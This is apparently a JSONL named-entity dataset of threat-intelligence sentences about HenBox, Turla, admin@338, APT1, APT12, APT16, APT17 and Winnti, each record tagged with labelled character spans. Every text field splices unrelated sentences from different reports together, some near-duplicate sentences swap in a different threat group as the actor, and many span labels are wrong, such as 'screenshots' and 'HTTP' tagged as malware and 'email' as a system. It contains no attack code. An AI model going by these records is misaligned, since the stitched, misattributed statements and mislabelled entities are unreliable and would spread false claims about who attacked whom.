According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": [{"start": 66, "end": 71, "label": "Organization"}, {"start": 204, "end": 211, "label": "Organization"}, {"start": 218, "end": 227, "label": "Organization"}, {"start": 237, "end": 243, "label": "System"}, {"start": 287, "end": 294, "label": "Vulnerability"}, {"start": 295, "end": 311, "label": "Organization"}, {"start": 312, "end": 327, "label": "Vulnerability"}, {"start": 378, "end": 385, "label": "Malware"}]} {"text": "Of note , in addition to tracking the compromised device \u2019 s location , HenBox also harvests all outgoing phone numbers with an \u201c 86 \u201d prefix , which is the country code for the People \u2019 s Republic of China ( PRC ) . Turla is perhaps most notoriously suspected as responsible for the breach of the United States Central Command in 2008 . The admin@338 's Dropbox accounts have also been found to contain a different backdoor dubbed BUBBLEWRAP .", "spans": [{"start": 72, "end": 78, "label": "Malware"}, {"start": 217, "end": 222, "label": "Organization"}, {"start": 342, "end": 351, "label": "Organization"}, {"start": 355, "end": 362, "label": "System"}, {"start": 432, "end": 442, "label": "Malware"}]} {"text": "It can also access the phone \u2019 s cameras and microphone . More recently Turla was accused of breaching RUAG , a Swiss technology company , in a public report published by GovCERT.ch . 
Researchers have pointed out that it is not uncommon for China-based threat groups to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement .", "spans": [{"start": 72, "end": 77, "label": "Organization"}, {"start": 103, "end": 107, "label": "Organization"}, {"start": 171, "end": 181, "label": "Organization"}, {"start": 253, "end": 266, "label": "Organization"}, {"start": 287, "end": 306, "label": "Organization"}]} {"text": "HenBox has ties to infrastructure used in targeted attacks with a focus on politics in South East Asia . The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository . Researchers have pointed out that it is not uncommon for admin@338 to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 176, "end": 188, "label": "Malware"}, {"start": 215, "end": 225, "label": "Organization"}, {"start": 328, "end": 337, "label": "Organization"}, {"start": 358, "end": 377, "label": "Organization"}]} {"text": "These attackers have used additional malware families in previous activity dating to at least 2015 that include PlugX , Zupdax , 9002 , and Poison Ivy . Assuming this variant of KopiLuwak has been observed in the wild , there are a number of ways it may have been delivered including some of Turla\u2019s previous attack methods such as spear phishing or via a watering hole . 
This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose .", "spans": [{"start": 112, "end": 117, "label": "Malware"}, {"start": 120, "end": 126, "label": "Malware"}, {"start": 129, "end": 133, "label": "Malware"}, {"start": 140, "end": 150, "label": "Malware"}, {"start": 292, "end": 299, "label": "Organization"}, {"start": 397, "end": 404, "label": "Organization"}, {"start": 461, "end": 470, "label": "Organization"}, {"start": 517, "end": 523, "label": "System"}, {"start": 530, "end": 539, "label": "Organization"}, {"start": 549, "end": 569, "label": "Organization"}, {"start": 605, "end": 620, "label": "Organization"}]} {"text": "This also aligns with HenBox \u2019 s timeline , as in total we have identified almost 200 HenBox samples , with the oldest dating to 2015 . This could include diplomats , experts in the areas of interest related to the Digital Economy Task Force , or possibly even journalists . The attackers used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": [{"start": 22, "end": 28, "label": "Malware"}, {"start": 86, "end": 92, "label": "Malware"}, {"start": 155, "end": 164, "label": "Organization"}, {"start": 261, "end": 272, "label": "Organization"}, {"start": 279, "end": 288, "label": "Organization"}, {"start": 306, "end": 320, "label": "Malware"}, {"start": 325, "end": 338, "label": "Malware"}, {"start": 339, "end": 346, "label": "Malware"}, {"start": 378, "end": 398, "label": "Organization"}]} {"text": "Most of the samples we found date from the last half of 2017 , fewer samples date from 2016 , and a handful date back to 2015 . Turla's goal could include diplomats , experts in the areas of interest related to the Digital Economy Task Force , or possibly even journalists . 
The admin@338 used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": [{"start": 128, "end": 135, "label": "Organization"}, {"start": 215, "end": 230, "label": "Organization"}, {"start": 279, "end": 288, "label": "Organization"}, {"start": 306, "end": 320, "label": "Malware"}, {"start": 325, "end": 338, "label": "Malware"}, {"start": 339, "end": 346, "label": "Malware"}, {"start": 378, "end": 398, "label": "Organization"}]} {"text": "In 2018 , we have already observed a small but consistent number of samples . The earliest step in any possible attack(s) involving this variant of KopiLuwak of which Proofpoint researchers are currently aware begin with the MSIL dropper . FireEye analysts documented the admin@338 group 's activities in a previous paper titled Poison Ivy : Assessing Damage and Extracting Intelligence paper .", "spans": [{"start": 148, "end": 157, "label": "Malware"}, {"start": 225, "end": 237, "label": "Malware"}, {"start": 240, "end": 247, "label": "Organization"}, {"start": 272, "end": 287, "label": "Organization"}, {"start": 329, "end": 339, "label": "Malware"}]} {"text": "We believe this indicates a fairly sustained campaign that has gained momentum over recent months . The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper . The spear-phishing campaign against Asian entities isn't isolated , the admin@338 also started another attack against the US-based think tank on 14th March .", "spans": [{"start": 148, "end": 160, "label": "Malware"}, {"start": 215, "end": 238, "label": "Malware"}, {"start": 313, "end": 322, "label": "Organization"}, {"start": 372, "end": 382, "label": "Organization"}]} {"text": "HenBox Enters the Uyghur App Store In May 2016 , a HenBox app was downloaded from uyghurapps [ . 
As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only . Our analysis has led us to conclude that APT1 is likely government-sponsored and one of the most persistent of China 's cyber threat actors .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 18, "end": 34, "label": "System"}, {"start": 51, "end": 57, "label": "Malware"}, {"start": 82, "end": 96, "label": "Indicator"}, {"start": 140, "end": 150, "label": "Malware"}, {"start": 173, "end": 185, "label": "Malware"}, {"start": 265, "end": 274, "label": "Malware"}, {"start": 342, "end": 346, "label": "Organization"}, {"start": 421, "end": 440, "label": "Organization"}]} {"text": "] net . As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload . FireEye said it has tracked admin@338 's activity since 2013 and the group has largely targeted organizations involved in financial , economic , and trade policy .", "spans": [{"start": 11, "end": 21, "label": "Organization"}, {"start": 153, "end": 165, "label": "Malware"}, {"start": 168, "end": 175, "label": "Organization"}, {"start": 196, "end": 205, "label": "Organization"}, {"start": 290, "end": 299, "label": "Organization"}, {"start": 302, "end": 310, "label": "Organization"}, {"start": 317, "end": 329, "label": "Organization"}]} {"text": "Specifically , the app was an Android Package ( APK ) file that will be discussed in more detail shortly . The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . 
The simplest conclusion based on these facts is that APT1 is operating in China , and most likely in Shanghai .", "spans": [{"start": 30, "end": 45, "label": "System"}, {"start": 128, "end": 137, "label": "Malware"}, {"start": 156, "end": 174, "label": "Malware"}, {"start": 197, "end": 214, "label": "Malware"}, {"start": 310, "end": 314, "label": "Organization"}]} {"text": "The domain name , language of the site and app content hosted suggest this site is a third-party app store for whom the intended users are the Uyghurs . Despite the added capabilities , we still agree with Kaspersky that this backdoor is likely used as an initial reconnaissance tool and would probably be used as a staging point to deploy one of Turla\u2019s more fully featured implants . These data sets show that APT1 is either operating in China during normal Chinese business hours or that APT1 is intentionally going to painstaking lengths to look like they are .", "spans": [{"start": 206, "end": 215, "label": "Organization"}, {"start": 347, "end": 354, "label": "Organization"}, {"start": 412, "end": 416, "label": "Organization"}, {"start": 491, "end": 495, "label": "Organization"}]} {"text": "Such app stores are so-called because they are not officially supported by Android , nor are they provided by Google , unlike the Play Store . Turla is a complex cyberattack platform focused predominantly on diplomatic and government-related targets , particularly in the Middle East , Central and Far East Asia , Europe , North and South America and former Soviet bloc nations . 
APT1 has used and steadily modified BISCUIT since as early as 2007 and continues to use it presently .", "spans": [{"start": 75, "end": 82, "label": "System"}, {"start": 110, "end": 116, "label": "Organization"}, {"start": 130, "end": 140, "label": "System"}, {"start": 143, "end": 148, "label": "Organization"}, {"start": 380, "end": 384, "label": "Organization"}, {"start": 416, "end": 423, "label": "Malware"}]} {"text": "Third-party app stores are ubiquitous in China for a number of reasons including : evermore powerful Chinese Original Equipment Manufacturers ( OEM ) , a lack of an official Chinese Google Play app store , and a growing smartphone market . We didn\u2019t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves . While APT1 intruders occasionally use publicly available backdoors such as Poison Ivy and Gh0st RAT .", "spans": [{"start": 101, "end": 149, "label": "Organization"}, {"start": 182, "end": 193, "label": "System"}, {"start": 291, "end": 303, "label": "Malware"}, {"start": 324, "end": 335, "label": "Malware"}, {"start": 355, "end": 359, "label": "Organization"}, {"start": 387, "end": 415, "label": "Malware"}, {"start": 424, "end": 434, "label": "Malware"}, {"start": 439, "end": 448, "label": "Malware"}]} {"text": "The HenBox app downloaded in May 2016 was masquerading as the DroidVPN app . The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan . 
Given the mission , resourcing , and location of PLA Unit 61398 , we conclude that PLA Unit 61398 is APT1 .", "spans": [{"start": 4, "end": 10, "label": "Malware"}, {"start": 62, "end": 70, "label": "Indicator"}, {"start": 93, "end": 104, "label": "Malware"}, {"start": 129, "end": 149, "label": "Malware"}, {"start": 208, "end": 222, "label": "Organization"}, {"start": 242, "end": 256, "label": "Organization"}, {"start": 260, "end": 264, "label": "Organization"}]} {"text": "At the time of writing , the content served at the given URL on uyghurapps [ . Moreover , Turla now also has a heavily obfuscated PowerShell Trojan that is similar to KopiLuwak . APT1 were a highly prolific cyber-attack group operating out of China .", "spans": [{"start": 64, "end": 78, "label": "Indicator"}, {"start": 90, "end": 95, "label": "Organization"}, {"start": 179, "end": 183, "label": "Organization"}]} {"text": "] net , is now a legitimate version of the DroidVPN app , and looks as shown in Figure 1 below . RocketMan!\u201d (probably a reference to Donald Trump\u2019s nickname for Kim Jong Un) and MiamiBeach\u201d serve as the first beacon messages from the victim to the control server . APT1 is a China-based cyber-espionage group , active since mid-2006 .", "spans": [{"start": 43, "end": 51, "label": "Indicator"}, {"start": 97, "end": 108, "label": "Malware"}, {"start": 179, "end": 190, "label": "Malware"}, {"start": 266, "end": 270, "label": "Organization"}]} {"text": "henbox_2 Figure 1 Uyghurapps [ . These could be tools to circumvent internet censorship , such as Softether VPN 4.12\u201d and psiphon3\u201d , or Microsoft Office activators\u201d . 
APT12 's targets are consistent with larger People 's Republic of China ( PRC ) goals .", "spans": [{"start": 18, "end": 32, "label": "Indicator"}, {"start": 98, "end": 117, "label": "Malware"}, {"start": 122, "end": 131, "label": "Malware"}, {"start": 137, "end": 165, "label": "Malware"}, {"start": 168, "end": 173, "label": "Organization"}]} {"text": "] net app store showing the current DroidVPN app Virtual Private Network ( VPN ) tools allow connections to remote private networks , increasing the security and privacy of the user \u2019 s communications . These campaign-related VPSs are located in South Africa . Since the release of the Arbor blog post , FireEye has observed APT12 use a modified backdoor that we call HIGHTIDE .", "spans": [{"start": 36, "end": 44, "label": "Indicator"}, {"start": 226, "end": 230, "label": "Organization"}, {"start": 286, "end": 291, "label": "Organization"}, {"start": 304, "end": 311, "label": "Organization"}, {"start": 325, "end": 330, "label": "Organization"}, {"start": 368, "end": 376, "label": "Malware"}]} {"text": "According to the DroidVPN app description , it \u201c helps bypass regional internet restrictions , web filtering and firewalls by tunneling traffic over ICMP. \u201d Some features may require devices to be rooted to function and according to some 3rd party app stores , unconditional rooting is required , which has additional security implications for the device . The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems . 
However , the malware shared several traits with the RIPTIDE and HIGHTIDE backdoor that we have attributed to APT12 .", "spans": [{"start": 17, "end": 25, "label": "Indicator"}, {"start": 390, "end": 396, "label": "Malware"}, {"start": 418, "end": 424, "label": "Malware"}, {"start": 427, "end": 435, "label": "Malware"}, {"start": 440, "end": 453, "label": "Malware"}, {"start": 456, "end": 482, "label": "Malware"}, {"start": 538, "end": 545, "label": "Malware"}, {"start": 550, "end": 567, "label": "Malware"}, {"start": 595, "end": 600, "label": "Organization"}]} {"text": "We have not been able to ascertain how the DroidVPN app on the uyghurapps [ . The PowerShell version of the Trojan also has the ability to get screenshots . From October 2012 to May 2014 , FireEye observed APT12 utilizing RIPTIDE , that communicates via HTTP to a hard-coded command and control ( C2 ) server .", "spans": [{"start": 43, "end": 51, "label": "Indicator"}, {"start": 63, "end": 77, "label": "Indicator"}, {"start": 82, "end": 92, "label": "Malware"}, {"start": 139, "end": 142, "label": "Malware"}, {"start": 143, "end": 154, "label": "Malware"}, {"start": 189, "end": 196, "label": "Organization"}, {"start": 206, "end": 211, "label": "Organization"}, {"start": 222, "end": 229, "label": "Malware"}, {"start": 254, "end": 258, "label": "Malware"}, {"start": 297, "end": 299, "label": "System"}]} {"text": "] net app store was replaced with the malicious HenBox app ; however , some indicators point to the server running an outdated version of Apache Web Server on a Windows 32-Bit operating system . The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally , it includes the #screen\u201d command to take a screenshot . 
Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 .", "spans": [{"start": 48, "end": 54, "label": "Malware"}, {"start": 161, "end": 168, "label": "System"}, {"start": 199, "end": 205, "label": "Malware"}, {"start": 230, "end": 251, "label": "Malware"}, {"start": 388, "end": 393, "label": "Organization"}, {"start": 422, "end": 430, "label": "Malware"}, {"start": 439, "end": 453, "label": "System"}, {"start": 456, "end": 460, "label": "Indicator"}, {"start": 486, "end": 499, "label": "Vulnerability"}]} {"text": "In light of this , we believe an attack against unpatched vulnerabilities is a reasonable conjecture for how the server was compromised . The usage of KopiLuwak , a well-known and exclusive artefact previously used by the Turla group , makes us attribute this campaign to this actor with high confidence . FireEye believes the change from RIPTIDE to HIGHTIDE represents a temporary tool shift to decrease malware detection while APT12 developed a completely new malware toolset .", "spans": [{"start": 48, "end": 73, "label": "Vulnerability"}, {"start": 151, "end": 160, "label": "System"}, {"start": 222, "end": 227, "label": "Organization"}, {"start": 306, "end": 313, "label": "Organization"}, {"start": 339, "end": 346, "label": "Malware"}, {"start": 350, "end": 358, "label": "Malware"}, {"start": 429, "end": 434, "label": "Organization"}]} {"text": "The HenBox app downloaded in May 2016 , as described in Table 1 below , masquerades as a legitimate version of the DroidVPN app by using the same app name \u201c DroidVPN \u201d and the same iconography used when displaying the app in Android \u2019 s launcher view , as highlighted in Figure 2 below Table 1 . Winnti's mode of operation: to collect information on the organizational charts of companies , on cooperating departments , on the IT systems of individual business units , and on trade secrets , obviously . 
They have largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors .", "spans": [{"start": 115, "end": 123, "label": "Indicator"}, {"start": 157, "end": 165, "label": "System"}, {"start": 225, "end": 232, "label": "System"}, {"start": 296, "end": 304, "label": "Organization"}, {"start": 369, "end": 388, "label": "Organization"}, {"start": 441, "end": 466, "label": "Organization"}, {"start": 557, "end": 566, "label": "Organization"}, {"start": 569, "end": 577, "label": "Organization"}, {"start": 582, "end": 594, "label": "Organization"}, {"start": 632, "end": 636, "label": "Malware"}, {"start": 645, "end": 655, "label": "Malware"}, {"start": 671, "end": 691, "label": "Malware"}]} {"text": "APK SHA256 Size ( bytes ) First Seen App Package name App name 0589bed1e3b3d6234c30061be3be1cc6685d786ab3a892a8d4dae8e2d7ed92f7 2,740,860 May 2016 com.android.henbox DroidVPN Table 1 Details of the HenBox DroidVPN app on the uyghurapps [ . Hackers usually take precautions , which experts refer to as Opsec . 
A China-based cyber threat group , which FireEye tracks as an uncategorized advanced persistent threat ( APT ) group and other researchers refer to as admin@338 , may have conducted the activity .", "spans": [{"start": 63, "end": 127, "label": "Indicator"}, {"start": 147, "end": 165, "label": "Indicator"}, {"start": 166, "end": 174, "label": "System"}, {"start": 198, "end": 204, "label": "Malware"}, {"start": 205, "end": 213, "label": "System"}, {"start": 225, "end": 239, "label": "Indicator"}, {"start": 240, "end": 247, "label": "Organization"}, {"start": 350, "end": 357, "label": "Organization"}, {"start": 460, "end": 469, "label": "Organization"}]} {"text": "] net app store henbox_3 Figure 2 HenBox app installed , purporting to be DroidVPN Depending on the language setting on the device , and for this particular variant of HenBox , the installed HenBox app may have the name \u201c Backup \u201d but uses the same DroidVPN logo . The Winnti group\u2019s Opsec was dismal to say the least . The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": [{"start": 34, "end": 40, "label": "Malware"}, {"start": 74, "end": 82, "label": "Indicator"}, {"start": 168, "end": 174, "label": "Malware"}, {"start": 191, "end": 197, "label": "Malware"}, {"start": 249, "end": 257, "label": "Indicator"}, {"start": 269, "end": 275, "label": "Organization"}, {"start": 358, "end": 367, "label": "Organization"}, {"start": 372, "end": 392, "label": "Organization"}, {"start": 432, "end": 438, "label": "System"}, {"start": 481, "end": 490, "label": "Organization"}]} {"text": "Other variants use other names and logos , as described later . This mode of operation is typical of many hacker groups\u2014and especially of Winnti . 
About four months after The New York Times publicized an attack on its network , the APT12 behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families .", "spans": [{"start": 106, "end": 112, "label": "Organization"}, {"start": 138, "end": 144, "label": "Organization"}, {"start": 171, "end": 189, "label": "Organization"}, {"start": 232, "end": 237, "label": "Organization"}, {"start": 294, "end": 313, "label": "Malware"}, {"start": 318, "end": 354, "label": "Malware"}]} {"text": "Given the DroidVPN look and feel being used by this variant of HenBox , it \u2019 s highly likely the uyghurapps [ . They are a very , very persistent group , \u201d says Costin Raiu , who has been watching Winnti since 2011 . With this in mind , this week we are providing some indicators for a China based adversary who we crypt as \" NUMBERED PANDA \" Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc .", "spans": [{"start": 10, "end": 18, "label": "Indicator"}, {"start": 63, "end": 69, "label": "Malware"}, {"start": 97, "end": 111, "label": "Indicator"}, {"start": 161, "end": 172, "label": "Organization"}, {"start": 197, "end": 203, "label": "Organization"}, {"start": 326, "end": 340, "label": "Organization"}, {"start": 343, "end": 357, "label": "Organization"}, {"start": 444, "end": 451, "label": "Organization"}, {"start": 454, "end": 460, "label": "Organization"}, {"start": 463, "end": 470, "label": "Organization"}, {"start": 473, "end": 479, "label": "Organization"}]} {"text": "] net page for DroidVPN remained identical when serving either HenBox or DroidVPN apps , just that the legitimate APK file had been replaced with HenBox for an unknown period of time . Raiu and his team have followed the digital tracks left behind by some of the Winnti hackers . 
Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc .", "spans": [{"start": 15, "end": 23, "label": "Indicator"}, {"start": 63, "end": 69, "label": "Malware"}, {"start": 73, "end": 81, "label": "Indicator"}, {"start": 185, "end": 189, "label": "Organization"}, {"start": 263, "end": 269, "label": "Organization"}, {"start": 280, "end": 294, "label": "Organization"}, {"start": 381, "end": 388, "label": "Organization"}, {"start": 391, "end": 397, "label": "Organization"}, {"start": 400, "end": 407, "label": "Organization"}, {"start": 410, "end": 416, "label": "Organization"}]} {"text": "In addition to the look and feel of DroidVPN , this HenBox variant also contained a legitimate DroidVPN app within its APK package as an asset , which could be compared to a resource item within a Windows Portable Executable ( PE ) file . One government official puts it very matter-of-factly: Winnti is very specific to Germany . The new campaigns mark the first significant stirrings from the APT12 since it went silent in January in the wake of a detailed expose of the group and its exploits \u2014 and a retooling of what security researchers believe is a massive spying operation based in China .", "spans": [{"start": 36, "end": 44, "label": "Indicator"}, {"start": 52, "end": 58, "label": "Malware"}, {"start": 95, "end": 103, "label": "Indicator"}, {"start": 197, "end": 224, "label": "System"}, {"start": 294, "end": 300, "label": "Organization"}, {"start": 395, "end": 400, "label": "Organization"}]} {"text": "Once the HenBox app is installed and launched , it launches an install process for the embedded app as a decoy to other malicious behaviors occurring in the background , and to satisfy the victim with the app they were requesting , assuming they requested to download a particular app , such as DroidVPN . By 2014 , the Winnti malware code was no longer limited to game manufacturers . 
Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT16 launched several spear phishing attacks targeting Japan and Taiwan in the high-tech , government services , media and financial services industries .", "spans": [{"start": 9, "end": 15, "label": "Malware"}, {"start": 295, "end": 303, "label": "System"}, {"start": 320, "end": 326, "label": "Organization"}, {"start": 365, "end": 383, "label": "Organization"}, {"start": 471, "end": 476, "label": "Organization"}, {"start": 551, "end": 560, "label": "Organization"}, {"start": 563, "end": 582, "label": "Organization"}, {"start": 585, "end": 590, "label": "Organization"}, {"start": 595, "end": 624, "label": "Organization"}]} {"text": "The version of the legitimate DroidVPN embedded inside this HenBox variant is the same version of DroidVPN available for download from uyghurapps [ . Winnti is targeting high-tech companies as well as chemical and pharmaceutical companies . Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries .", "spans": [{"start": 30, "end": 38, "label": "Indicator"}, {"start": 60, "end": 66, "label": "Malware"}, {"start": 98, "end": 106, "label": "Indicator"}, {"start": 135, "end": 149, "label": "Indicator"}, {"start": 150, "end": 156, "label": "Organization"}, {"start": 170, "end": 189, "label": "Organization"}, {"start": 214, "end": 238, "label": "Organization"}, {"start": 326, "end": 336, "label": "Organization"}, {"start": 431, "end": 440, "label": "Organization"}, {"start": 443, "end": 462, "label": "Organization"}, {"start": 465, "end": 470, "label": "Organization"}, {"start": 475, "end": 504, "label": "Organization"}]} {"text": "] net , at the time of writing . Winnti is attacking companies in Japan , France , the U.S. and Germany . 
On November 26 , 2015 , a suspected China-based APT16 sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies .", "spans": [{"start": 33, "end": 39, "label": "Organization"}, {"start": 154, "end": 159, "label": "Organization"}, {"start": 211, "end": 217, "label": "System"}, {"start": 239, "end": 248, "label": "Organization"}, {"start": 253, "end": 272, "label": "Organization"}]} {"text": "It \u2019 s worth noting , newer versions of the DroidVPN app are available on Google Play , as well as in some other third-party app stores , which could indicate uyghurapps [ . The Winnti hackers broke into Henkel\u2019s network in 2014 . On November 26 , 2015 , a suspected China-based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies .", "spans": [{"start": 44, "end": 52, "label": "System"}, {"start": 74, "end": 85, "label": "System"}, {"start": 159, "end": 173, "label": "Indicator"}, {"start": 178, "end": 184, "label": "Organization"}, {"start": 204, "end": 212, "label": "Organization"}, {"start": 340, "end": 346, "label": "System"}, {"start": 368, "end": 377, "label": "Organization"}, {"start": 382, "end": 401, "label": "Organization"}]} {"text": "] net is not awfully well maintained or updated to the latest apps available . Henkel confirms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions . 
While attribution of the first two spear phishing attacks is still uncertain , we attribute the second December phishing campaign to the China-based APT group that we refer to as APT16 .", "spans": [{"start": 79, "end": 85, "label": "Organization"}, {"start": 99, "end": 105, "label": "Organization"}, {"start": 436, "end": 441, "label": "Organization"}]} {"text": "At the time of writing , to our knowledge no other third-party app stores , nor the official Google Play store , were or are hosting this malicious HenBox variant masquerading as DroidVPN . Far from attacking Henkel and the other companies arbitrarily , Winnti takes a highly strategic approach . APT16 actors sent spear phishing emails to two Taiwanese media organizations .", "spans": [{"start": 93, "end": 104, "label": "System"}, {"start": 148, "end": 154, "label": "Malware"}, {"start": 179, "end": 187, "label": "Indicator"}, {"start": 209, "end": 215, "label": "Organization"}, {"start": 254, "end": 260, "label": "Organization"}, {"start": 297, "end": 309, "label": "Organization"}, {"start": 330, "end": 336, "label": "System"}, {"start": 354, "end": 373, "label": "Organization"}]} {"text": "The Right App at the Right Time The malicious HenBox and embedded DroidVPN app combination is one instance of the type of legitimate apps the attackers choose to mimic to compromise their victims . The hackers behind Winnti have also set their sights on Japan\u2019s biggest chemical company , Shin-Etsu Chemical . 
On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website .", "spans": [{"start": 46, "end": 52, "label": "Malware"}, {"start": 66, "end": 74, "label": "Indicator"}, {"start": 202, "end": 209, "label": "Organization"}, {"start": 270, "end": 286, "label": "Organization"}, {"start": 289, "end": 307, "label": "Organization"}, {"start": 332, "end": 337, "label": "Organization"}, {"start": 357, "end": 362, "label": "Organization"}, {"start": 383, "end": 393, "label": "Organization"}, {"start": 420, "end": 437, "label": "Organization"}]} {"text": "These threat actors frequently offer malicious apps purporting to be legitimate apps that are broadly used or important to a targeted population . In the case of another Japanese company , Sumitomo Electric , Winnti apparently penetrated their networks during the summer of 2016 . It is possible , although not confirmed , that APT16 was also responsible for targeting this government agency , given both the timeframe and the use of the same n-day to eventually deploy the ELMER backdoor .", "spans": [{"start": 189, "end": 206, "label": "Organization"}, {"start": 209, "end": 215, "label": "Organization"}, {"start": 328, "end": 333, "label": "Organization"}, {"start": 374, "end": 391, "label": "Organization"}, {"start": 474, "end": 488, "label": "Malware"}]} {"text": "It \u2019 s worth noting however , about one-third of the HenBox apps contained embedded APK objects that did not refer to legitimate apps . Winnti hackers also penetrated the BASF and Siemens networks . 
Despite the differing sponsorship , penetration of Hong Kong and Taiwan-based media organizations continues to be a priority for China-based APT16 .", "spans": [{"start": 53, "end": 59, "label": "Malware"}, {"start": 136, "end": 142, "label": "Organization"}, {"start": 171, "end": 175, "label": "Organization"}, {"start": 180, "end": 187, "label": "Organization"}, {"start": 188, "end": 196, "label": "Organization"}, {"start": 277, "end": 296, "label": "Organization"}, {"start": 340, "end": 345, "label": "Organization"}]} {"text": "Some were only 3 bytes long , containing strings such as \u201c ddd \u201d and \u201c 333 \u201d , or were otherwise corrupted . Thanks to this tool , we found out back in March 2019 that the Bayer pharmaceutical group had been hacked by Winnti . The suspected APT16 targeting of the Taiwanese government agency \u2013 in addition to the Taiwanese media organizations \u2013 further supports this possibility .", "spans": [{"start": 172, "end": 192, "label": "Organization"}, {"start": 218, "end": 224, "label": "Organization"}, {"start": 241, "end": 246, "label": "Organization"}, {"start": 274, "end": 291, "label": "Organization"}, {"start": 323, "end": 342, "label": "Organization"}]} {"text": "Beyond the previously mentioned DroidVPN example , other viable embedded apps we found include apps currently available on Google Play , as well as many third-party app stores . At Gameforge , the Winnti hackers had already been removed from the networks when a staff member noticed a Windows start screen with Chinese characters . 
APT17 was embedding the encoded CnC IP address for the BLACKCOFFEE malware in legitimate Microsoft TechNet profiles pages and forum threads , a method some in the information security community call a \" dead drop resolver \" .", "spans": [{"start": 32, "end": 40, "label": "Indicator"}, {"start": 123, "end": 134, "label": "System"}, {"start": 181, "end": 190, "label": "Organization"}, {"start": 197, "end": 203, "label": "Organization"}, {"start": 332, "end": 337, "label": "Organization"}, {"start": 368, "end": 370, "label": "Indicator"}, {"start": 387, "end": 398, "label": "Malware"}, {"start": 399, "end": 406, "label": "Malware"}, {"start": 421, "end": 430, "label": "Organization"}, {"start": 495, "end": 525, "label": "Organization"}]} {"text": "Table 2 below lists some of these apps with their respective metadata . To witnesses , the spy appears to be running a program showing videos (e.g VLC) , presenting slides (Prezi) , playing a computer game (Breakout2 , 2048) or even running a fake virus scanner . APT17 , also known as DeputyDog , is a China-based threat group that FireEye Intelligence has observed conducting network intrusions against U.S. 
government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations .", "spans": [{"start": 91, "end": 94, "label": "Organization"}, {"start": 154, "end": 171, "label": "System"}, {"start": 243, "end": 261, "label": "System"}, {"start": 264, "end": 269, "label": "Organization"}, {"start": 286, "end": 295, "label": "Organization"}, {"start": 333, "end": 353, "label": "Organization"}, {"start": 410, "end": 429, "label": "Organization"}, {"start": 436, "end": 452, "label": "Organization"}, {"start": 455, "end": 464, "label": "Organization"}, {"start": 467, "end": 499, "label": "Organization"}, {"start": 502, "end": 518, "label": "Organization"}, {"start": 525, "end": 553, "label": "Organization"}]} {"text": "Sample 1 marks the first HenBox sample we saw embedding a legitimate app within its assets to be dropped and installed on the victim device as a decoy . From the time of file creation , the attacker started working at least as early as July 2018 . FireEye has monitored APT17 's use of BLACKCOFFEE variants since 2013 to masquerade malicious communication as normal web traffic by disguising the CnC communication as queries to web search engines .", "spans": [{"start": 25, "end": 31, "label": "Malware"}, {"start": 190, "end": 198, "label": "Organization"}, {"start": 248, "end": 255, "label": "Organization"}, {"start": 270, "end": 275, "label": "Organization"}, {"start": 286, "end": 297, "label": "Malware"}]} {"text": "The legitimate app in question was a Uyghur language keyboard app targeted at native speakers of the Uyghur language and their smartphones . The link to feeds.rapidfeeds.com left in its XML configuration file was also mentioned by Kaspersky\u2019s report in the reference section , which confirms that the APT-C-09 group keeps updating its C2 configuration channel and the recent one reserves some past features . 
